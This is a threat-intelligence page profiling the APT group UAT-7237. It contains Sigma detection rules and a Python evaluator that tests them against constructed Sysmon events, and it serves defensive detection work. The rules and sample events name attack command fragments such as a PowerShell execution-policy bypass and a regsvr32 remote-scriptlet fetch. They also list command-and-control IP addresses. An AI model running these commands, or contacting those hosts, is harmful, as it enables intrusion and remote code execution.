Threat Actor 🇨🇳 China

UAT-7237


UAT-7237 is a Chinese-speaking APT group, active since at least 2022, that primarily targets web infrastructure entities in Taiwan. The group runs shellcode, including Cobalt Strike payloads, through a customized shellcode loader known as "SoundBill", and relies on SoftEther VPN clients and RDP for persistent remote access. It extracts credentials with Mimikatz, performs reconnaissance with WMI-based tools, and deploys web shells selectively rather than on every compromised host. Its tooling is largely open-source or lightly customized, and its operations indicate a focus on long-term persistence and stealth; an unexpected SoftEther VPN client or RDP session on a web server is therefore an early sign of this access pattern worth reviewing.

Indicators of Compromise (13)

MITRE ATT&CK TTPs (10)

Detection Rules

UAT_7237_SIGMA_Detection (Sigma, AI-generated)
title: UAT-7237 (CL-STA-1062) Activity - Process Indicators
id: 3a8d5e2b-9c1e-4f0a-9b2d-7a8c4f1c3e4a
status: experimental
description: A Sigma rule has exactly one logsource, so the process, DLL-load, network and file indicators are split into the separate documents of this collection instead of mixing fields from four event types under process_creation.
logsource:
    category: process_creation
    product: windows
detection:
    selection_exe:
        OriginalFileName: 'PerfWatson2.exe'
    selection_cmd:
        CommandLine|contains:
            - 'powershell -exec bypass -w 1'
            - 'regsvr32 /s /n /u /i:'
    selection_hashes:
        Hashes|contains:
            - 'SHA256=00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c'
            - 'SHA256=f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1'
            - 'SHA256=dce5df29bddff5a4ddaea5c4fec14da91f7b69063a6e1c45ed61e5da4fc6c87b'
            - 'SHA256=cbfe8de6ffadbb1d396f61e63eb18e8b11c29527c1528641e3223d4c516cf7c3'
            - 'SHA256=4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384'
            - 'SHA256=9b481b69cd91b09fa7bae7428f646dd89473a4c03393e43da81fe756cde1c472'
    condition: 1 of selection_*
falsepositives:
    - Administrative scripting that uses these switches; the powershell and regsvr32 fragments are generic, so tune them or require co-occurrence with another selection before raising the level
level: high
---
title: UAT-7237 (CL-STA-1062) Activity - AppDomainManager DLL Load
# id: assign a UUID before deployment
status: experimental
logsource:
    category: image_load
    product: windows
detection:
    selection:
        ImageLoaded|endswith: '\AppDomainManager.dll'
    condition: selection
level: high
---
title: UAT-7237 (CL-STA-1062) C2 Communication
# id: assign a UUID before deployment
status: experimental
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationIp:
            - '139.180.134.221'
            - '202.182.102.5'
            - '45.76.210.43'
            - '45.32.113.172'
    condition: selection
falsepositives:
    - Unlikely
level: critical
---
title: UAT-7237 (CL-STA-1062) Staging Archive Written
# id: assign a UUID before deployment
status: experimental
logsource:
    category: file_event
    product: windows
detection:
    selection:
        TargetFilename|endswith: '\chrome_setup.zip'
    condition: selection
falsepositives:
    - Legitimate Chrome installer archives saved under this name (rare)
level: medium

Rules are AI-generated and unvalidated. Test in a safe environment before production use.
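To see what each selection above actually needs from a log pipeline, the following added example (written for this page, not tooling from the page's source or any vendor) applies the rule's indicators to a handful of constructed Sysmon-style events. The event dicts, hostnames, paths and hash prefixes other than the page's SHA256 values are made up; the field names follow Sysmon (EventID 1 process create, 3 network connect, 7 image load, 11 file create), and string comparisons are case-insensitive as Sigma's default modifiers are.

```python
# Added example: a minimal evaluator for the UAT-7237 indicators on this page,
# run over constructed Sysmon-style events. Not the page's or a vendor's code.

# Indicators copied from the Sigma rule above (lower-cased where compared).
IOC = {
    "original_file_name": "perfwatson2.exe",
    "command_line_fragments": ("powershell -exec bypass -w 1", "regsvr32 /s /n /u /i:"),
    "sha256": {
        "00e09754526d0fe836ba27e3144ae161b0ecd3774abec5560504a16a67f0087c",
        "f34bd1d485de437fe18360d1e850c3fd64415e49d691e610711d8d232071a0b1",
        "dce5df29bddff5a4ddaea5c4fec14da91f7b69063a6e1c45ed61e5da4fc6c87b",
        "cbfe8de6ffadbb1d396f61e63eb18e8b11c29527c1528641e3223d4c516cf7c3",
        "4e1f8888d020decd09799ec946f1bf677cac6612b24582ddbf4d8ede425d8384",
        "9b481b69cd91b09fa7bae7428f646dd89473a4c03393e43da81fe756cde1c472",
    },
    "c2_ips": {"139.180.134.221", "202.182.102.5", "45.76.210.43", "45.32.113.172"},
    "dll_suffix": "\\appdomainmanager.dll",
    "file_suffix": "\\chrome_setup.zip",
}


def sha256_from_hashes(hashes_field: str):
    """Sysmon writes Hashes as 'SHA1=...,MD5=...,SHA256=...,IMPHASH=...'.
    Return the SHA256 value lower-cased, or None if the field lacks one."""
    for part in hashes_field.split(","):
        key, _, value = part.partition("=")
        if key.strip().upper() == "SHA256":
            return value.strip().lower()
    return None


def match_event(event: dict) -> list:
    """Return the names of the rule selections this one event satisfies."""
    hits = []
    eid = event.get("EventID")
    if eid == 1:  # process creation
        if event.get("OriginalFileName", "").lower() == IOC["original_file_name"]:
            hits.append("selection_exe")
        cmd = event.get("CommandLine", "").lower()
        if any(frag in cmd for frag in IOC["command_line_fragments"]):
            hits.append("selection_cmd")
        if sha256_from_hashes(event.get("Hashes", "")) in IOC["sha256"]:
            hits.append("selection_hashes")
    elif eid == 3:  # network connection; outbound only, as the rule requires
        if event.get("Initiated") == "true" and event.get("DestinationIp") in IOC["c2_ips"]:
            hits.append("selection_net")
    elif eid == 7:  # image (DLL) load
        if event.get("ImageLoaded", "").lower().endswith(IOC["dll_suffix"]):
            hits.append("selection_img")
    elif eid == 11:  # file create
        if event.get("TargetFilename", "").lower().endswith(IOC["file_suffix"]):
            hits.append("selection_file")
    return hits


def scan(events: list) -> dict:
    """Map event index -> matched selections, for events that matched anything."""
    return {i: hits for i, ev in enumerate(events) if (hits := match_event(ev))}


# Constructed sample events (paths, the MD5/SHA1 stubs and the URL are made up).
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": "C:\\Users\\Public\\PerfWatson2.exe",
     "OriginalFileName": "PerfWatson2.exe", "CommandLine": "PerfWatson2.exe",
     "Hashes": "SHA1=aa,MD5=bb,SHA256=00E09754526D0FE836BA27E3144AE161B0ECD3774ABEC5560504A16A67F0087C"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": "regsvr32 /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
    # Same technique invoked as 'regsvr32.exe ...': the page's fragment does not match it.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\regsvr32.exe", "OriginalFileName": "REGSVR32.EXE",
     "CommandLine": "regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll"},
    {"EventID": 3, "Initiated": "true", "DestinationIp": "45.32.113.172", "DestinationPort": 443},
    {"EventID": 3, "Initiated": "false", "SourceIp": "45.32.113.172", "DestinationIp": "10.0.0.5"},
    {"EventID": 7, "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\MSBuild.exe",
     "ImageLoaded": "C:\\Users\\Public\\AppDomainManager.dll"},
    {"EventID": 11, "TargetFilename": "C:\\Users\\Public\\Downloads\\chrome_setup.zip"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\notepad.exe", "OriginalFileName": "NOTEPAD.EXE",
     "CommandLine": "notepad.exe", "Hashes": "SHA256=ff"},
]

if __name__ == "__main__":
    for idx, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(hits)}")
```

Two things the sample set makes visible. The inbound connection from a listed address (event 4) does not fire, because the network selection keys on `Initiated: 'true'`; that is deliberate, since an inbound hit is a different signal from beaconing. The third event shows a real gap in the page's command-line indicator: `regsvr32 /s /n /u /i:` matches only when the binary is invoked without its `.exe` suffix, so a pipeline that wants the technique rather than that one spelling should key on `Image|endswith: '\regsvr32.exe'` together with the `/i:` switch instead.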

Source Articles